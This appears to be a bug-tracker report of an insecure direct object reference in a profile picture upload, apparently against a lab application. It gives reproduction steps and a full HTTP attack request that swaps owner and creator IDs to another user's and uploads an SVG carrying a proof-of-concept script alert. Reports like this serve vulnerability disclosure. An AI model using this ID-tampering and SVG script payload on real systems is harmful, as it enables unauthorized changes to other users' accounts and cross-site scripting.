IDOR on profile pic upload #3
Description
Steps to reproduce:
- Login as a normal user
- Update your profile picture with any picture
- Capture the request using an intercepting proxy
- Resend the request after changing the creator_id and owner_id to that of another user
- Navigate to the other users wall and view the upload image
Attack Request:
POST /image HTTP/1.1
Host: 192.168.99.100:8443
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: https://192.168.99.100:8443/settings?id=1002
Content-Type: multipart/form-data; boundary=--------207487880
Content-Length: 884
Cookie: JSESSIONID=CB39DD1389BDE85C38D86EDE670B1363
----------207487880
Content-Disposition: form-data; name="file"; filename="image.svg"
Content-Type: image/svg+xml
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert('This app is probably vulnerable to XSS attacks!');
</script>
</svg>
----------207487880
Content-Disposition: form-data; name="owner_id"
486
----------207487880
Content-Disposition: form-data; name="creator_id"
486
----------207487880
Content-Disposition: form-data; name="context"
profile
----------207487880
Content-Disposition: form-data; name="label"
Test Picture
----------207487880--
Attack Response:
HTTP/1.1 302
Location: settings?id=486
Content-Length: 0
Date: Thu, 26 Oct 2017 13:49:46 GMT
Connection: close